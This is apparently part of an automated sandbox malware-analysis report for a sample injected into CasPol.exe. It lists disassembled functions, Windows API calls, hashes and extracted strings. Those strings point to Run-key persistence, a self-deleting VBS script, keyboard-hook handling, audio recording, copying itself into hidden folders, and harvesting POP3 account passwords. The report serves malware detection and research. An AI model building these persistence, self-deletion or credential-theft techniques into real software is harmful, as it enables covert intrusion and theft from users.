                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0ff0afc4033c8097fa85024f27eb8d2cb461690346b9c5d2a3b848a4b1a1dc9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                                                                                                                                                  Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                                                                                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                    • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                                                  • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                                                                                  • API String ID: 3797177996-1998216422
                                                                                                                                                                                                                                  • Opcode ID: c4fd55e8162246b3427640c0cf19c4ccb8f9c4dfa99a5eb786c2603916bf8397
                                                                                                                                                                                                                                  • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4fd55e8162246b3427640c0cf19c4ccb8f9c4dfa99a5eb786c2603916bf8397
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                                                                                                                                                  Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                                                                                                                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                                                                                                                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                                                                                                                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                                                                                                                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                                                                                                                                                  • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                                                                                                                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                                                                                                                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                                                                                                  • API String ID: 738084811-1408154895
                                                                                                                                                                                                                                  • Opcode ID: 019af8e3db36541d7291a6da923be061b250e09238e75596b659195e670c1a9a
                                                                                                                                                                                                                                  • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 019af8e3db36541d7291a6da923be061b250e09238e75596b659195e670c1a9a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                                                                                                                                                  Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Write$Create
                                                                                                                                                                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                                                                  • API String ID: 1602526932-4212202414
                                                                                                                                                                                                                                  • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                  • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                                                                                                                                  Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-165202446
                                                                                                                                                                                                                                  • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                  • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                                                                                                                                  Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                                                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                                                                                                                                                                  • API String ID: 1579085052-1280438975
                                                                                                                                                                                                                                  • Opcode ID: dec0745cfa18f76b7aa5e2b406210ea6b89cc7dcad6710e0ba16a4f732bb1ce0
                                                                                                                                                                                                                                  • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dec0745cfa18f76b7aa5e2b406210ea6b89cc7dcad6710e0ba16a4f732bb1ce0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                                                                                                                                  Function 10007310 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(winhttp.dll,?,10002B6F), ref: 10007316
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 10007333
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 10007340
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 1000734D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 1000735A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 10007367
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 10007374
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 10007381
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 1000738E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                  • String ID: WinHttpCloseHandle$WinHttpConnect$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$winhttp.dll
                                                                                                                                                                                                                                  • API String ID: 2238633743-1483618772
                                                                                                                                                                                                                                  • Opcode ID: 38b6a5f0677133c9a3ca117cc90bcc93c37312f047caed2b466f28f2473e8c26
                                                                                                                                                                                                                                  • Instruction ID: e8a3204d4a55cb4efda40a2bc34e722aa0141a8d0c6d521df876b84b5db0583d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38b6a5f0677133c9a3ca117cc90bcc93c37312f047caed2b466f28f2473e8c26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88115430C1133896F760EBB5AC98F67BEECEB41684F60021BF504521A4D7B85587DF50
                                                                                                                                                                                                                                  Function 0457173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 04571CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D1B
                                                                                                                                                                                                                                    • Part of subcall function 04571CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 04571D37
                                                                                                                                                                                                                                    • Part of subcall function 04571CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D4B
                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 04571855
                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 04571869
                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 0457188B
                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 045718AE
                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 045718C8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                                                  • API String ID: 3296212668-3023110444
                                                                                                                                                                                                                                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                                  • Instruction ID: 590da2b12ae7b6d15c5148ecf307b88f2dfb043fa21d54891ebdce5de41f28b1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55614771D00619AAFF159BA4F840BDEBBB9BF85308F0044B6D104A7345DB707A46EF55
                                                                                                                                                                                                                                  Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                                                                                                                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                                                                                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                                                                                                                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                                                                                                                                                  • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041B313
                                                                                                                                                                                                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041B370
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                  • API String ID: 3941738427-1684325040
                                                                                                                                                                                                                                  • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                                                                                                                                  • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                                                                                                                                                  Function 045719B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                                                  • API String ID: 4218353326-230879103
                                                                                                                                                                                                                                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                                  • Instruction ID: 9391192956f4165443988981c1cc0532325790aa214baa2c7670f947a0709ca4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA71F871D00629ABEF11ABB4A884ADF7FFCBF45304F1440E6E544D7241E674A785EBA0
                                                                                                                                                                                                                                  Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3899193279-0
                                                                                                                                                                                                                                  • Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                                                                                                                                                  • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                                                                                                                                                  Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
